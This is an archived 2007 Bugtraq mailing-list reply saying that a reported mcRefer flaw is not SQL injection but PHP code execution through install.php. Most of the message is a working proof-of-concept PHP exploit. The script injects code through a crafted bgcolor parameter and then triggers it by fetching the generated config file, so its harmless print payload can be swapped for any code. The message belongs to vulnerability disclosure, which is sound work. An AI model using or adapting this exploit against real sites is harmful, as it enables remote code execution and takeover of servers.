lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070211112617.20122.qmail@securityfocus.com>
Date: 11 Feb 2007 11:26:17 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: Re: mcRefer SQL injection

This is not an SQL Injection. The script don't use any SQL database, please tell me where is the sql request =). However the install.php script can lead to php code execution (works regardless of php.ini settings). Proof of concept:
-----

#!/usr/bin/php
<?php
# This file require the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
#
# Author: DarkFig
# Mail: gmdarkfig@...il.com
#
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

$url = ""; # http://<host><path>
$cod = "print(poc)";
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
$xpl->post($url.'install','p=XD&verif=1&envoi=Entrer');
$xpl->post($url.'install.php',"bgcolor=%24wazup%7B%24hello%7B${cod}%7D%7D&tablecolor=1&tdcolor=1&fontface=1&fontsize=1&fontcolor=1&nomsite=1&url=$url&email=me%40u.com&pass=XD&verif=1&submit=1");
$xpl->get($url.'mcrconf.inc.php');
print($xpl->getcontent());

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ